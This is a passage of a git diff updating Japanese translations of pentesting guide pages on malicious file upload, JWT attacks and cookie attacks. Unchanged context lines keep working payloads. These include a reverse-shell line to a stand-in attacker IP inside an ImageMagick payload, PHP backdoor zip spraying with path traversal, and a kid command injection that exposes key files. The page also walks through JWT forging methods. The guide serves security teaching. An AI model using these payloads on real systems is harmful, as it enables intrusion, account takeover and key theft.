-他のファイルへのソフトリンクを含むリンクをアップロードし、解凍されたファイルにアクセスすることで、リンクされたファイルにアクセスします。
+他のファイルへのソフトリンクを含むリンクをアップロードし、解凍されたファイルにアクセスすることでリンクされたファイルにアクセスします。
 ```
 ln -s ../../../index.php symindex.txt
 zip --symlinks test.zip symindex.txt
@@ -222,7 +222,7 @@ tar -cvf test.tar symindex.txt
 
 展開中にディレクトリ内にファイルが予期せず作成されることは重大な問題です。この設定が悪意のあるファイルアップロードによるOSレベルのコマンド実行を防ぐと最初は考えられていましたが、ZIPアーカイブ形式の階層的圧縮サポートとディレクトリトラバーサル機能が悪用される可能性があります。これにより、攻撃者は制限を回避し、ターゲットアプリケーションの展開機能を操作することで安全なアップロードディレクトリから脱出することができます。
 
-そのようなファイルを作成するための自動化されたエクスプロイトは[**evilarc on GitHub**](https://github.com/ptoomey3/evilarc)で入手可能です。このユーティリティは次のように使用できます:
+そのようなファイルを作成するための自動化されたエクスプロイトは[**evilarc on GitHub**](https://github.com/ptoomey3/evilarc)で入手可能です。このユーティリティは以下のように使用できます:
 ```python
 # Listing available options
 python2 evilarc.py -h
@@ -251,7 +251,7 @@ create_zip()
 ```
 **圧縮を悪用したファイルスプレーイング**
 
-詳細については**元の投稿を確認してください**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
+さらなる詳細は**元の投稿を確認してください**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
 
 1.  **PHPシェルの作成**: PHPコードは、`$_REQUEST`変数を通じて渡されたコマンドを実行するように書かれています。
 
@@ -270,7 +270,7 @@ root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php
 root@s2crew:/tmp# zip cmd.zip xx*.php
 ```
 
-3.  **Hexエディタまたはviによる修正**: zip内のファイル名がviまたはhexエディタを使用して変更され、「xxA」を「../」に変更してディレクトリを横断します。
+3.  **Hexエディタまたはviを使用した修正**: zip内のファイル名はviまたはhexエディタを使用して変更され、「xxA」を「../」に変更してディレクトリを横断します。
 
 ```bash
 :set modifiable
@@ -287,30 +287,30 @@ viewbox 0 0 640 480
 fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
 pop graphic-context
 ```
-## PNGファイルへのPHPシェルの埋め込み
+## PNGにPHPシェルを埋め込む
 
-PNGファイルのIDATチャンクにPHPシェルを埋め込むことで、特定の画像処理操作を効果的に回避できます。PHP-GDの`imagecopyresized`および`imagecopyresampled`関数は、この文脈で特に関連性が高く、画像のリサイズやリサンプリングに一般的に使用されます。埋め込まれたPHPシェルがこれらの操作に影響されない能力は、特定のユースケースにおいて重要な利点です。
+PNGファイルのIDATチャンクにPHPシェルを埋め込むことで、特定の画像処理操作を効果的に回避できます。PHP-GDの`imagecopyresized`および`imagecopyresampled`関数は、この文脈で特に関連性が高く、画像のリサイズやリサンプリングに一般的に使用されます。埋め込まれたPHPシェルがこれらの操作の影響を受けない能力は、特定のユースケースにおいて重要な利点です。
 
-この技術の詳細な探求、方法論および潜在的な応用については、次の記事で提供されています: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)。このリソースは、プロセスとその影響についての包括的な理解を提供します。
+この技術の詳細な探求、方法論および潜在的な応用については、次の記事に記載されています: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)。このリソースは、プロセスとその影響について包括的な理解を提供します。
 
 詳細情報は次のリンクにあります: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
 
 ## ポリグロットファイル
 
-ポリグロットファイルはサイバーセキュリティにおいてユニークなツールとして機能し、複数のファイル形式に同時に有効に存在できるカメレオンのような役割を果たします。興味深い例としては、GIFとRARアーカイブの両方として機能するハイブリッドである[GIFAR](https://en.wikipedia.org/wiki/Gifar)があります。このようなファイルはこのペアリングに限らず、GIFとJSやPPTとJSのような組み合わせも可能です。
+ポリグロットファイルはサイバーセキュリティにおいてユニークなツールとして機能し、複数のファイル形式で同時に有効に存在できるカメレオンのような役割を果たします。興味深い例としては、GIFとRARアーカイブの両方として機能するハイブリッドである[GIFAR](https://en.wikipedia.org/wiki/Gifar)があります。このようなファイルはこのペアリングに限らず、GIFとJSやPPTとJSのような組み合わせも可能です。
 
-ポリグロットファイルの主な利点は、タイプに基づいてファイルをスクリーニングするセキュリティ対策を回避できる能力にあります。さまざまなアプリケーションでは、JPEG、GIF、DOCなどの特定のファイルタイプのみをアップロードすることが許可されており、潜在的に有害な形式(例:JS、PHP、またはPharファイル)によるリスクを軽減しています。しかし、ポリグロットは複数のファイルタイプの構造基準に適合することで、これらの制限を巧妙に回避できます。
+ポリグロットファイルの主な利点は、タイプに基づいてファイルをスクリーニングするセキュリティ対策を回避できる能力にあります。さまざまなアプリケーションでは、JPEG、GIF、DOCなどの特定のファイルタイプのみをアップロードすることが許可されており、潜在的に有害なフォーマット(例:JS、PHP、Pharファイル)によるリスクを軽減しています。しかし、ポリグロットは複数のファイルタイプの構造基準に適合することで、これらの制限を巧妙に回避できます。
 
-適応性があるにもかかわらず、ポリグロットには制限があります。たとえば、ポリグロットがPHARファイル(PHp ARchive)とJPEGを同時に具現化している場合でも、そのアップロードの成功はプラットフォームのファイル拡張子ポリシーに依存することがあります。システムが許可される拡張子に厳格である場合、ポリグロットの単なる構造的二重性ではアップロードを保証するには不十分な場合があります。
+適応性がある一方で、ポリグロットには制限もあります。たとえば、ポリグロットがPHARファイル(PHp ARchive)とJPEGを同時に具現化している場合でも、そのアップロードの成功はプラットフォームのファイル拡張子ポリシーに依存することがあります。システムが許可される拡張子に厳格であれば、ポリグロットの単なる構造的二重性ではアップロードを保証するには不十分な場合があります。
 
 詳細情報は次のリンクにあります: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
 
 ### PDFのように有効なJSONをアップロードする
 
-PDFファイルとして偽装して有効なJSONファイルをアップロードすることでファイルタイプの検出を回避する方法(**[このブログ記事](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**からの技術):
+PDFファイルを偽装して有効なJSONファイルをアップロードすることでファイルタイプの検出を回避する方法(**[このブログ記事](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**からの技術):
 
 - **`mmmagic`ライブラリ**: 最初の1024バイトに`%PDF`マジックバイトが含まれていれば有効です(投稿から例を取得)
-- **`pdflib`ライブラリ**: JSONのフィールド内に偽のPDF形式を追加し、ライブラリがPDFだと認識するようにします(投稿から例を取得)
+- **`pdflib`ライブラリ**: JSONのフィールド内に偽のPDFフォーマットを追加し、ライブラリがPDFだと認識するようにします(投稿から例を取得)
 - **`file`バイナリ**: ファイルから最大1048576バイトを読み取ることができます。それより大きなJSONを作成し、内容をJSONとして解析できないようにし、その中に実際のPDFの初期部分を入れると、PDFだと思われます。
 
 ## 参考文献
diff --git a/src/pentesting-web/hacking-jwt-json-web-tokens.md b/src/pentesting-web/hacking-jwt-json-web-tokens.md
index 579c8998e..8672d7c15 100644
--- a/src/pentesting-web/hacking-jwt-json-web-tokens.md
+++ b/src/pentesting-web/hacking-jwt-json-web-tokens.md
@@ -21,9 +21,9 @@ python3 jwt_tool.py -M at \
 ```bash
 python3 jwt_tool.py -Q "jwttool_706649b802c9f5e41052062a3787b291"
 ```
-You can also use the [**Burp Extension SignSaboteur**](https://github.com/d0ge/sign-saboteur)を使用して、BurpからJWT攻撃を開始できます。
+You can also use the [**Burp Extension SignSaboteur**](https://github.com/d0ge/sign-saboteur) to launch JWT attacks from Burp.
 
-### 何も変更せずにデータを改ざんする
+### データを変更せずに改ざんする
 
 署名をそのままにしてデータを改ざんし、サーバーが署名を確認しているかどうかをチェックできます。例えば、ユーザー名を「admin」に変更してみてください。
 
@@ -31,39 +31,39 @@ You can also use the [**Burp Extension SignSaboteur**](https://github.com/d0ge/s
 
 JWTの署名が検証されているかどうかを確認するには:
 
-- エラーメッセージは継続的な検証を示唆します。詳細なエラーに含まれる機密情報は確認する必要があります。
-- 返されたページの変更も検証を示します。
-- 変更がない場合は検証が行われていないことを示します。この場合、ペイロードの主張を改ざんする実験を行うべきです。
+- エラーメッセージが検証中を示唆している場合、詳細なエラーに含まれる敏感な情報を確認する必要があります。
+- 返されたページの変更も検証を示しています。
+- 変更がない場合は検証が行われていないことを示唆しており、この時にペイロードの主張を改ざんする実験を行うべきです。
 
 ### 起源
 
-トークンがサーバー側で生成されたのか、クライアント側で生成されたのかを、プロキシのリクエスト履歴を調べて判断することが重要です。
+トークンがサーバー側で生成されたのか、クライアント側で生成されたのかを、プロキシのリクエスト履歴を調べることで判断することが重要です。
 
 - クライアント側から最初に見られたトークンは、キーがクライアント側のコードに露出している可能性があるため、さらなる調査が必要です。
-- サーバー側から発生したトークンは、安全なプロセスを示します。
+- サーバー側から発生したトークンは、安全なプロセスを示しています。
 
-### 期間
+### 有効期間
 
-トークンが24時間以上持続するかどうかを確認してください...もしかしたら決して期限切れにならないかもしれません。「exp」フィールドがある場合、サーバーがそれを正しく処理しているか確認してください。
+トークンが24時間以上持続するかどうかを確認してください...もしかしたら決して期限切れにならないかもしれません。「exp」フィールドがある場合、サーバーがそれを正しく処理しているかどうかを確認してください。
 
 ### HMAC秘密鍵のブルートフォース
 
 [**このページを参照してください。**](../generic-hacking/brute-force.md#jwt)
 
-### アルゴリズムをNoneに変更する
+### アルゴリズムをNoneに変更
 
 使用するアルゴリズムを「None」に設定し、署名部分を削除します。
 
-Burp拡張機能「JSON Web Token」を使用して、この脆弱性を試し、JWT内の異なる値を変更します(リクエストをリピーターに送信し、「JSON Web Token」タブでトークンの値を変更できます。「Alg」フィールドの値を「None」に設定することもできます)。
+Burp拡張機能「JSON Web Token」を使用してこの脆弱性を試し、JWT内の異なる値を変更します(リクエストをリピーターに送信し、「JSON Web Token」タブでトークンの値を変更できます。「Alg」フィールドの値を「None」に設定することもできます)。
 
-### アルゴリズムRS256(非対称)をHS256(対称)に変更する(CVE-2016-5431/CVE-2016-10555)
+### アルゴリズムをRS256(非対称)からHS256(対称)に変更する (CVE-2016-5431/CVE-2016-10555)
 
 アルゴリズムHS256は、秘密鍵を使用して各メッセージに署名し、検証します。\
 アルゴリズムRS256は、プライベートキーを使用してメッセージに署名し、公開鍵を認証に使用します。
 
 アルゴリズムをRS256からHS256に変更すると、バックエンドコードは公開鍵を秘密鍵として使用し、その後HS256アルゴリズムを使用して署名を検証します。
 
-次に、公開鍵を使用し、RS256をHS256に変更することで、有効な署名を作成できます。これを実行して、ウェブサーバーの証明書を取得できます。
+次に、公開鍵を使用し、RS256をHS256に変更することで、有効な署名を作成できます。これを実行してウェブサーバーの証明書を取得できます:
 ```bash
 openssl s_client -connect example.com:443 2>&1 < /dev/null | sed -n '/-----BEGIN/,/-----END/p' > certificatechain.pem #For this attack you can use the JOSEPH Burp extension. In the Repeater, select the JWS tab and select the Key confusion attack. Load the PEM, Update the request and send it. (This extension allows you to send the "non" algorithm attack also). It is also recommended to use the tool jwt_tool with the option 2 as the previous Burp Extension does not always works well.
 openssl x509 -pubkey -in certificatechain.pem -noout > pubkey.pem
@@ -75,13 +75,13 @@ openssl x509 -pubkey -in certificatechain.pem -noout > pubkey.pem
 これは「JSON Web Tokens」Burp拡張機能を使用して行うことができます。\
 (リクエストをリピーターに送信し、JSON Web Tokenタブ内で「CVE-2018-0114」を選択してリクエストを送信します)。
 
-### JWKS スプーフィング
+### JWKSスプーフィング
 
-この手順は、特に「jku」ヘッダー主張を使用するJWTトークンのセキュリティを評価する方法を詳述しています。この主張は、トークンの検証に必要な公開鍵を含むJWKS(JSON Web Key Set)ファイルへのリンクであるべきです。
+この手順は、特に「jku」ヘッダー主張を使用するJWTトークンのセキュリティを評価する方法を詳述しています。この主張は、トークンの検証に必要な公開鍵を含むJWKS(JSON Web Key Set)ファイルにリンクする必要があります。
 
 - **「jku」ヘッダーを持つトークンの評価**:
 - 「jku」主張のURLを確認して、適切なJWKSファイルにリンクしていることを確認します。
-- トークンの「jku」値を変更して、制御されたWebサービスに向け、トラフィックを観察できるようにします。
+- トークンの「jku」値を変更して、制御されたWebサービスに向けることで、トラフィックを観察します。
 - **HTTPインタラクションの監視**:
 - 指定したURLへのHTTPリクエストを観察することで、サーバーが提供されたリンクから鍵を取得しようとしていることがわかります。
 - このプロセスで`jwt_tool`を使用する際は、テストを容易にするために、`jwtconf.ini`ファイルを個人のJWKSの場所で更新することが重要です。
@@ -95,7 +95,7 @@ python3 jwt_tool.py JWT_HERE -X s
 
 ### Kidの問題の概要
 
-オプションのヘッダー主張である`kid`は、特定の鍵を識別するために使用され、トークン署名検証のために複数の鍵が存在する環境では特に重要です。この主張は、トークンの署名を検証するために適切な鍵を選択するのに役立ちます。
+`kid`として知られるオプションのヘッダー主張は、特定の鍵を識別するために使用され、トークン署名検証のために複数の鍵が存在する環境では特に重要です。この主張は、トークンの署名を検証するために適切な鍵を選択するのに役立ちます。
 
 #### 「kid」を通じて鍵を明らかにする
 
@@ -103,11 +103,11 @@ python3 jwt_tool.py JWT_HERE -X s
 
 #### 「kid」を使用したパス横断
 
-`kid`主張は、ファイルシステムをナビゲートするために悪用される可能性があり、任意のファイルを選択できる可能性があります。特定のファイルやサービスをターゲットにするために`kid`値を変更することで、接続性をテストしたり、サーバーサイドリクエストフォージェリ(SSRF)攻撃を実行したりすることが可能です。元の署名を保持しながら`kid`値を変更するためにJWTを改ざんすることは、以下のように`-T`フラグを使用して達成できます。
+`kid`主張は、ファイルシステムをナビゲートするために悪用される可能性があり、任意のファイルを選択できる可能性があります。特定のファイルやサービスをターゲットにするために`kid`値を変更することで、接続性をテストしたり、サーバーサイドリクエストフォージェリ(SSRF)攻撃を実行したりすることが可能です。元の署名を保持しながら`kid`値を変更するためにJWTを改ざんすることは、以下のように`-T`フラグを使用して`jwt_tool`で実行できます。
 ```bash
 python3 jwt_tool.py  -I -hc kid -hv "../../dev/null" -S hs256 -p ""
 ```
-ファイルの予測可能な内容をターゲットにすることで、有効なJWTを偽造することが可能です。例えば、Linuxシステムの`/proc/sys/kernel/randomize_va_space`ファイルは、値**2**を含むことで知られており、JWT生成の対称パスワードとして**2**を`kid`パラメータに使用できます。
+ファイルの予測可能な内容をターゲットにすることで、有効なJWTを偽造することが可能です。たとえば、Linuxシステムの`/proc/sys/kernel/randomize_va_space`ファイルは、値**2**を含むことで知られており、JWT生成の対称パスワードとして**2**を`kid`パラメータに使用できます。
 
 #### "kid"を介したSQLインジェクション
 
@@ -119,7 +119,7 @@ python3 jwt_tool.py  -I -hc kid -hv "../../dev/null" -S hs256 -p ""
 
 #### "kid"を介したOSインジェクション
 
-`kid`パラメータがコマンド実行コンテキスト内で使用されるファイルパスを指定するシナリオは、リモートコード実行(RCE)脆弱性につながる可能性があります。`kid`パラメータにコマンドを注入することで、プライベートキーを露出させることが可能です。RCEとキー露出を達成するための例のペイロードは次のとおりです:
+`kid`パラメータがコマンド実行コンテキスト内で使用されるファイルパスを指定するシナリオは、リモートコード実行(RCE)脆弱性を引き起こす可能性があります。`kid`パラメータにコマンドを注入することで、秘密鍵を露出させることが可能です。RCEと鍵の露出を達成するための例のペイロードは次のとおりです:
 
 `/root/res/keys/secret7.key; cd /root/res/keys/ && python -m SimpleHTTPServer 1337&`
 
@@ -128,15 +128,15 @@ python3 jwt_tool.py  -I -hc kid -hv "../../dev/null" -S hs256 -p ""
 #### jku
 
 jkuは**JWK Set URL**を表します。\
-トークンが“**jku**”**ヘッダー**クレームを使用している場合は、**提供されたURLを確認してください**。これは、トークンを検証するための公開鍵を保持するJWKSファイルを含むURLを指す必要があります。トークンを改ざんして、jku値を監視できるウェブサービスにポイントさせます。
+トークンが“**jku**”**ヘッダー**クレームを使用している場合は、**提供されたURLを確認してください**。これは、トークンを検証するための公開鍵を保持するJWKSファイルを含むURLを指す必要があります。トークンを改ざんして、jku値を監視できるWebサービスにポイントさせます。
 
-まず、新しいプライベートおよび公開鍵を持つ新しい証明書を作成する必要があります。
+まず、新しいプライベートおよびパブリックキーを持つ新しい証明書を作成する必要があります。
 ```bash
 openssl genrsa -out keypair.pem 2048
 openssl rsa -in keypair.pem -pubout -out publickey.crt
 openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key
 ```
-次に、例えば [**jwt.io**](https://jwt.io) を使用して、**作成した公開鍵と秘密鍵を使用し、パラメータ jku を作成した証明書にポイントします。** 有効な jku 証明書を作成するには、元の証明書をダウンロードし、必要なパラメータを変更できます。
+次に、例えば [**jwt.io**](https://jwt.io) を使用して、**作成した公開鍵と秘密鍵を使用し、パラメータ jku を作成した証明書にポイントする新しい JWT を作成できます。** 有効な jku 証明書を作成するには、元の証明書をダウンロードし、必要なパラメータを変更できます。
 
 公開証明書から "e" と "n" のパラメータを取得するには、次のようにします:
 ```bash
@@ -153,12 +153,12 @@ X.509 URL。PEM形式でエンコードされた一連のX.509(証明書フォ
 
 **このヘッダーをあなたの管理下にあるURLに変更**し、リクエストが受信されるか確認してください。その場合、**JWTを改ざんすることができる**かもしれません。
 
-あなたが管理する証明書を使用して新しいトークンを偽造するには、証明書を作成し、公開鍵と秘密鍵を抽出する必要があります:
+あなたが制御する証明書を使用して新しいトークンを偽造するには、証明書を作成し、公開鍵と秘密鍵を抽出する必要があります:
 ```bash
 openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -out attacker.crt
 openssl x509 -pubkey -noout -in attacker.crt > publicKey.pem
 ```
-次に、例えば [**jwt.io**](https://jwt.io) を使用して、**作成した公開鍵と秘密鍵を使用し、パラメータ x5u を作成した .crt 証明書にポイントする新しい JWT を作成できます。**
+その後、例えば [**jwt.io**](https://jwt.io) を使用して、**作成した公開鍵と秘密鍵を使用し、パラメータ x5u を作成した .crt 証明書にポイントする新しい JWT を作成できます。**
 
 ![](<../images/image (956).png>)
 
@@ -170,7 +170,7 @@ openssl x509 -pubkey -noout -in attacker.crt > publicKey.pem
 
 ![](<../images/image (1119).png>)
 
-攻撃者が**自己署名証明書を生成**し、対応する秘密鍵を使用して偽造トークンを作成し、「x5c」パラメータの値を新しく生成された証明書に置き換え、他のパラメータ、つまり n、e、x5t を修正すると、実質的に偽造トークンはサーバーによって受け入れられます。
+攻撃者が**自己署名証明書を生成**し、対応する秘密鍵を使用して偽造トークンを作成し、「x5c」パラメータの値を新しく生成した証明書に置き換え、他のパラメータ、つまり n、e、x5t を修正すれば、基本的に偽造トークンはサーバーによって受け入れられることになります。
 ```bash
 openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -outattacker.crt
 openssl x509 -in attacker.crt -text
@@ -207,7 +207,7 @@ const publicComponents = key.exportKey('components-public');
 console.log('Parameter n: ', publicComponents.n.toString("hex"));
 console.log('Parameter e: ', publicComponents.e.toString(16));
 ```
-最終的に、公開鍵と秘密鍵、そして新しい「n」と「e」値を使用して、[jwt.io](https://jwt.io)を使って任意の情報を持つ新しい有効なJWTを作成できます。
+最終的に、公開鍵と秘密鍵、そして新しい「n」と「e」の値を使用して、[jwt.io](https://jwt.io)を使って任意の情報を持つ新しい有効なJWTを偽造できます。
 
 ### ES256: 同じノンスで秘密鍵を明らかにする
 
@@ -222,6 +222,7 @@ JTI (JWT ID)クレームは、JWTトークンの一意の識別子を提供し
 
 ### JWT登録クレーム
 
+
 {{#ref}}
 https://www.iana.org/assignments/jwt/jwt.xhtml#claims
 {{#endref}}
@@ -236,12 +237,13 @@ https://www.iana.org/assignments/jwt/jwt.xhtml#claims
 
 **トークンの有効期限チェック**
 
-トークンの有効期限は「exp」ペイロードクレームを使用してチェックされます。JWTはセッション情報なしで使用されることが多いため、慎重な取り扱いが必要です。多くの場合、他のユーザーのJWTをキャプチャして再生することで、そのユーザーのなりすましが可能になることがあります。JWT RFCは、トークンの有効期限を設定するために「exp」クレームを利用してJWT再生攻撃を軽減することを推奨しています。さらに、アプリケーションによる関連チェックの実装が重要であり、この値の処理と期限切れトークンの拒否を確実に行う必要があります。トークンに「exp」クレームが含まれており、テストの時間制限が許可される場合、トークンを保存し、有効期限が切れた後に再生することが推奨されます。トークンの内容、タイムスタンプの解析および有効期限のチェック(UTCのタイムスタンプを含む)は、jwt_toolの-Rフラグを使用して読み取ることができます。
+トークンの有効期限は「exp」ペイロードクレームを使用してチェックされます。JWTはセッション情報なしで使用されることが多いため、慎重な取り扱いが必要です。多くの場合、他のユーザーのJWTをキャプチャして再生することで、そのユーザーを偽装できる可能性があります。JWT RFCは、トークンの有効期限を設定するために「exp」クレームを利用してJWT再生攻撃を軽減することを推奨しています。さらに、この値の処理と期限切れトークンの拒否を確実にするために、アプリケーションによる関連チェックの実装が重要です。トークンに「exp」クレームが含まれており、テストの時間制限が許可される場合、トークンを保存し、有効期限が切れた後に再生することが推奨されます。トークンの内容、タイムスタンプの解析および有効期限のチェック(UTCのタイムスタンプを含む)は、jwt_toolの-Rフラグを使用して読み取ることができます。
 
-- アプリケーションがトークンをまだ検証している場合、セキュリティリスクが存在する可能性があります。これは、トークンが決して期限切れにならないことを示唆する可能性があります。
+- アプリケーションがトークンをまだ検証している場合、トークンが決して期限切れにならないことを示唆する可能性があるため、セキュリティリスクが存在する可能性があります。
 
 ### ツール
 
+
 {{#ref}}
 https://github.com/ticarpi/jwt_tool
 {{#endref}}
diff --git a/src/pentesting-web/hacking-with-cookies/README.md b/src/pentesting-web/hacking-with-cookies/README.md
index 4c8bc2c85..cbc95b2e4 100644
--- a/src/pentesting-web/hacking-with-cookies/README.md
+++ b/src/pentesting-web/hacking-with-cookies/README.md
@@ -47,22 +47,22 @@ Cookieを設定する際には、これらの属性を理解することで、
 Table from [Invicti](https://www.netsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/) and slightly modified.\
 _**SameSite**_属性を持つCookieは、**CSRF攻撃を軽減**します。
 
-**\*Chrome80(2019年2月)以降、CookieにSameSite属性がない場合のデフォルトの動作はLaxになります** ([https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/](https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/)).\
-この変更を適用した後、Chromeでは**SameSiteポリシーのないCookie**は**最初の2分間はNoneとして扱われ、その後はトップレベルのクロスサイトPOSTリクエストに対してLaxとして扱われます。**
+**\*Chrome80(2019年2月)から、CookieにSameSite属性がない場合のデフォルトの動作はLaxになります** ([https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/](https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/)).\
+この変更を適用した後、Chromeでは**SameSiteポリシーのないCookieは最初の2分間はNoneとして扱われ、その後はトップレベルのクロスサイトPOSTリクエストに対してLaxとして扱われます。**
 
 ## Cookies Flags
 
 ### HttpOnly
 
-これは**クライアント**がCookieにアクセスするのを防ぎます(例えば、**Javascript**経由で:`document.cookie`)。
+これにより、**クライアント**がCookieにアクセスするのを防ぎます(例えば、**Javascript**経由で:`document.cookie`)。
 
 #### **Bypasses**
 
 - ページがリクエストのレスポンスとしてCookieを**送信している**場合(例えば、**PHPinfo**ページで)、XSSを悪用してこのページにリクエストを送り、レスポンスから**Cookieを盗む**ことが可能です(例は[こちら](https://blog.hackcommander.com/posts/2022/11/12/bypass-httponly-via-php-info-page/)を参照)。
-- **TRACE** **HTTP**リクエストを使用することでバイパス可能です。このHTTPメソッドが利用可能な場合、サーバーからのレスポンスは送信されたCookieを反映します。この技術は**Cross-Site Tracking**と呼ばれます。
+- **TRACE** **HTTP**リクエストを使用することでバイパス可能です。サーバーからのレスポンスは送信されたCookieを反映します。この技術は**Cross-Site Tracking**と呼ばれます。
 - この技術は、**モダンブラウザがJSからTRACEリクエストを送信することを許可しないことによって回避されます**。ただし、IE6.0 SP2に対して`TRACE`の代わりに`\r\nTRACE`を送信するなど、特定のソフトウェアでのバイパスが見つかっています。
 - 別の方法は、ブラウザのゼロデイ脆弱性を悪用することです。
-- Cookie Jarオーバーフロー攻撃を実行することで**HttpOnly Cookieを上書き**することが可能です:
+- Cookie Jarオーバーフロー攻撃を実行することで、**HttpOnly Cookieを上書きする**ことが可能です:
 
 {{#ref}}
 cookie-jar-overflow.md
@@ -89,17 +89,17 @@ cookie-jar-overflow.md
 
 ### Overwriting cookies
 
-したがって、`__Host-`で始まるCookieの保護の1つは、サブドメインから上書きされるのを防ぐことです。たとえば、[**Cookie Tossing attacks**](cookie-tossing.md)を防ぎます。トークで[**Cookie Crumbles: Unveiling Web Session Integrity Vulnerabilities**](https://www.youtube.com/watch?v=F_wAzF4a7Xg) ([**paper**](https://www.usenix.org/system/files/usenixsecurity23-squarcina.pdf))では、パーサーを騙すことでサブドメインから\_\_HOST-で始まるCookieを設定することが可能であることが示されています。たとえば、最初や最後に`=`を追加することによって...:
+したがって、`__Host-`で始まるCookieの保護の1つは、サブドメインからの上書きを防ぐことです。たとえば、[**Cookie Tossing attacks**](cookie-tossing.md)を防ぎます。トークで[**Cookie Crumbles: Unveiling Web Session Integrity Vulnerabilities**](https://www.youtube.com/watch?v=F_wAzF4a7Xg) ([**paper**](https://www.usenix.org/system/files/usenixsecurity23-squarcina.pdf))では、パーサーを騙すことでサブドメインから\_\_HOST-で始まるCookieを設定することが可能であることが示されています。たとえば、最初や最後に`=`を追加することなどです:
 
 

 
-また、PHPでは、Cookie名の先頭に**他の文字を追加**することで、**アンダースコア**文字に置き換えられ、`__HOST-` Cookieを上書きすることが可能でした:
+また、PHPでは、Cookie名の先頭に**他の文字を追加する**ことで、**アンダースコア**文字に置き換えられ、`__HOST-` Cookieを上書きすることが可能でした:
 
 

 
 ## Cookies Attacks
 
-カスタムCookieに機密データが含まれている場合は、特にCTFを行っている場合は確認してください。脆弱性があるかもしれません。
+カスタムCookieに機密データが含まれている場合は、特にCTFを行っている場合は、それを確認してください。脆弱性があるかもしれません。
 
 ### Decoding and Manipulating Cookies
 
@@ -107,13 +107,13 @@ Cookieに埋め込まれた機密データは常に精査されるべきです
 
 ### Session Hijacking
 
-この攻撃は、ユーザーのCookieを盗んで、アプリケーション内でのそのアカウントへの不正アクセスを得ることを含みます。盗まれたCookieを使用することで、攻撃者は正当なユーザーを偽装できます。
+この攻撃は、ユーザーのCookieを盗んで、アプリケーション内のそのアカウントに不正にアクセスすることを含みます。盗まれたCookieを使用することで、攻撃者は正当なユーザーを偽装できます。
 
 ### Session Fixation
 
 このシナリオでは、攻撃者が被害者を特定のCookieを使用してログインさせるように仕向けます。アプリケーションがログイン時に新しいCookieを割り当てない場合、攻撃者は元のCookieを持っているため、被害者を偽装できます。この技術は、被害者が攻撃者が提供したCookieでログインすることに依存しています。
 
-**サブドメインでXSSを見つけた場合**や**サブドメインを制御している場合**は、次を読んでください:
+**サブドメインにXSSを見つけた場合**や**サブドメインを制御している場合**は、次を読んでください:
 
 {{#ref}}
 cookie-tossing.md
@@ -123,7 +123,7 @@ cookie-tossing.md
 
 ここでは、攻撃者が被害者に攻撃者のセッションCookieを使用させるように仕向けます。被害者は自分のアカウントにログインしていると信じて、攻撃者のアカウントのコンテキストで意図せずにアクションを実行します。
 
-**サブドメインでXSSを見つけた場合**や**サブドメインを制御している場合**は、次を読んでください:
+**サブドメインにXSSを見つけた場合**や**サブドメインを制御している場合**は、次を読んでください:
 
 {{#ref}}
 cookie-tossing.md
@@ -133,7 +133,7 @@ cookie-tossing.md
 
 前のリンクをクリックして、JWTの可能な欠陥を説明するページにアクセスしてください。
 
-Cookieで使用されるJSON Web Tokens (JWT)も脆弱性を示す可能性があります。潜在的な欠陥とそれを悪用する方法についての詳細情報を得るには、JWTのハッキングに関するリンクされた文書にアクセスすることをお勧めします。
+Cookieで使用されるJSON Web Tokens (JWT)も脆弱性を示す可能性があります。潜在的な欠陥とそれを悪用する方法についての詳細情報を得るには、JWTをハッキングするためのリンクされた文書にアクセスすることをお勧めします。
 
 ### Cross-Site Request Forgery (CSRF)
 
@@ -147,7 +147,7 @@ document.cookie = "a=v1"
 document.cookie = "=test value;" // Setting an empty named cookie
 document.cookie = "b=v2"
 ```
-送信されたクッキー ヘッダーの結果は `a=v1; test value; b=v2;` です。興味深いことに、これは空の名前のクッキーが設定されている場合にクッキーを操作することを可能にし、空のクッキーを特定の値に設定することで他のクッキーを制御できる可能性があります。
+送信されたクッキー ヘッダーの結果は `a=v1; test value; b=v2;` です。興味深いことに、これは空の名前のクッキーが設定されている場合にクッキーを操作することを可能にし、空のクッキーを特定の値に設定することで他のクッキーを制御できる可能性があります:
 ```js
 function setCookie(name, value) {
 document.cookie = `${name}=${value}`
@@ -159,15 +159,15 @@ setCookie("", "a=b") // Setting the empty cookie modifies another cookie's value
 
 #### Chrome バグ: Unicode サロゲート コードポイントの問題
 
-Chrome では、Unicode サロゲート コードポイントが設定されたクッキーの一部である場合、`document.cookie` が破損し、その後空の文字列を返します:
+Chrome では、Unicode サロゲート コードポイントがセットされたクッキーの一部である場合、`document.cookie` が破損し、その後空の文字列を返します:
 ```js
 document.cookie = "\ud800=meep"
 ```
 これにより、`document.cookie`が空の文字列を出力し、永続的な破損を示します。
 
-#### パースの問題によるクッキーのスムグリング
+#### 解析の問題によるクッキーのスムグリング
 
